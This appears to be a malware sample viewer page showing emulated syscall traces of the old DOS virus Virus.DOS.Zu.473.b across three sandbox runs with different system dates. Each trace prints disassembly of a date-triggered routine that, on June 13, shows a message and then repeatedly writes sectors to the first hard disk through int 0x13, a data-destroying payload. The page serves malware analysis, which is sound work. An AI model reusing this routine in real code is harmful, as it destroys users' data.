Sample viewer

vx.netlux.org/Virus.DOS.Zu.473.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:58:58.587784678Z 42 PC: 12e32 | Get date 0x12e32: cmp dx, 0x60d
0x12e36: jne 0x12e5d
0x12e38: mov di, 0x1c8
0x12e3b: nop
0x12e3c: push si
0x12e3d: add si, di
0x12e3f: lodsb al, byte ptr [si]
0x12e40: or ax, 0xc00a
0x12e43: je 0x12e52
0x12e45: or dl, al
0x12e47: call 0x13cfe
0x12e4a: mov bl, 7
0x12e4c: int 0x10
0x12e4e: jmp 0x12e41
0x12e50: mov cx, 1
0x12e53: mov dx, 0x80
0x12e56: mov ax, 0x301
0x12e59: int 0x13
0x12e5b: inc cx
0x12e5c: jmp 0x12e53
2018-12-17T22:58:58.589516317Z 153 PC: 12e63 | UNKNOWN!

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13059,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:37:17.958398544Z 42 PC: 12e32 | Get date 0x12e32: cmp dx, 0x60d
0x12e36: jne 0x12e5d
0x12e38: mov di, 0x1c8
0x12e3b: nop
0x12e3c: push si
0x12e3d: add si, di
0x12e3f: lodsb al, byte ptr [si]
0x12e40: or ax, 0xc00a
0x12e43: je 0x12e52
0x12e45: or dl, al
0x12e47: call 0x13cfe
0x12e4a: mov bl, 7
0x12e4c: int 0x10
0x12e4e: jmp 0x12e41
0x12e50: mov cx, 1
0x12e53: mov dx, 0x80
0x12e56: mov ax, 0x301
0x12e59: int 0x13
0x12e5b: inc cx
0x12e5c: jmp 0x12e53
2018-12-25T12:37:17.962485047Z 153 PC: 12e63 | UNKNOWN!

{"DateBased":true,"Day":13,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13059,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:37:18.929959488Z 42 PC: 12e32 | Get date 0x12e32: cmp dx, 0x60d
0x12e36: jne 0x12e5d
0x12e38: mov di, 0x1c8
0x12e3b: nop
0x12e3c: push si
0x12e3d: add si, di
0x12e3f: lodsb al, byte ptr [si]
0x12e40: or ax, 0xc00a
0x12e43: je 0x12e52
0x12e45: or dl, al
0x12e47: call 0x13cfe
0x12e4a: mov bl, 7
0x12e4c: int 0x10
0x12e4e: jmp 0x12e41
0x12e50: mov cx, 1
0x12e53: mov dx, 0x80
0x12e56: mov ax, 0x301
0x12e59: int 0x13
0x12e5b: inc cx
0x12e5c: jmp 0x12e53
2018-12-25T12:37:18.9330591Z 14 PC: 13d54 | Set default drive (Drive = '0')
2018-12-25T12:37:18.934542343Z 46 PC: 13d69 | Set verify flag